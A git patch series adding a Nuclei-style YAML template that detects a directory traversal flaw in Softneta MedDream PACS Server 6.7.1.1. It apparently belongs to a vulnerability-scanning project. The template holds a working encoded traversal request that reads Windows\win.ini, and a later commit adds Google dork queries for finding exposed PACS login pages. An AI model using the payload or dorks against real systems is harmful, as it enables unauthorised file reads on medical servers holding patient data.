From 60c7746f76ad202608153bfb887f9b741ef40b42 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 26 Dec 2021 09:41:53 +0900 Subject: [PATCH 1/3] Create sofneta-mecdream-pacs-server-lfi.yaml --- sofneta-mecdream-pacs-server-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 sofneta-mecdream-pacs-server-lfi.yaml diff --git a/sofneta-mecdream-pacs-server-lfi.yaml b/sofneta-mecdream-pacs-server-lfi.yaml new file mode 100644 index 0000000000..14bd274712 --- /dev/null +++ b/sofneta-mecdream-pacs-server-lfi.yaml @@ -0,0 +1,24 @@ +id: sofneta-mecdream-pacs-server-lfi + +info: + name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + author: 0x_akoko + severity: high + description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal + reference: https://www.exploit-db.com/exploits/45347 + tags: sofneta,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" + + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From cb9fdbd7cc65eaad4f3b4baa313b451833dc201c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Dec 2021 11:28:09 +0530 Subject: [PATCH 2/3] Update and rename sofneta-mecdream-pacs-server-lfi.yaml to vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml --- .../other/sofneta-mecdream-pacs-server-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename sofneta-mecdream-pacs-server-lfi.yaml => vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml (100%) diff --git a/sofneta-mecdream-pacs-server-lfi.yaml b/vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml similarity index 100% rename from sofneta-mecdream-pacs-server-lfi.yaml rename to vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml index 14bd274712..965a186fac 100644 --- a/sofneta-mecdream-pacs-server-lfi.yaml +++ b/vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml @@ -16,9 +16,9 @@ requests: stop-at-first-match: true matchers: - type: word + part: body words: - "bit app support" - "fonts" - "extensions" condition: and - part: body From b70b9bcbf1d01901736fd810c74e7e12bd1a735f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 3 Jan 2022 10:21:00 +0530 Subject: [PATCH 3/3] Update and rename sofneta-mecdream-pacs-server-lfi.yaml to sofneta-mecdream-pacs-lfi.yaml --- ...cs-server-lfi.yaml => sofneta-mecdream-pacs-lfi.yaml} | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) rename vulnerabilities/other/{sofneta-mecdream-pacs-server-lfi.yaml => sofneta-mecdream-pacs-lfi.yaml} (63%) diff --git a/vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml similarity index 63% rename from vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml rename to vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml index 965a186fac..88c4402fbb 100644 --- a/vulnerabilities/other/sofneta-mecdream-pacs-server-lfi.yaml +++ b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -1,11 +1,15 @@ -id: sofneta-mecdream-pacs-server-lfi +id: sofneta-mecdream-pacs-lfi info: name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal author: 0x_akoko severity: high description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal - reference: https://www.exploit-db.com/exploits/45347 + reference: + - https://www.exploit-db.com/exploits/45347 + - https://www.softneta.com/products/meddream-pacs-server/downloads.html + metadata: + google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login tags: sofneta,lfi requests: @@ -13,7 +17,6 @@ requests: path: - "{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini" - stop-at-first-match: true matchers: - type: word part: body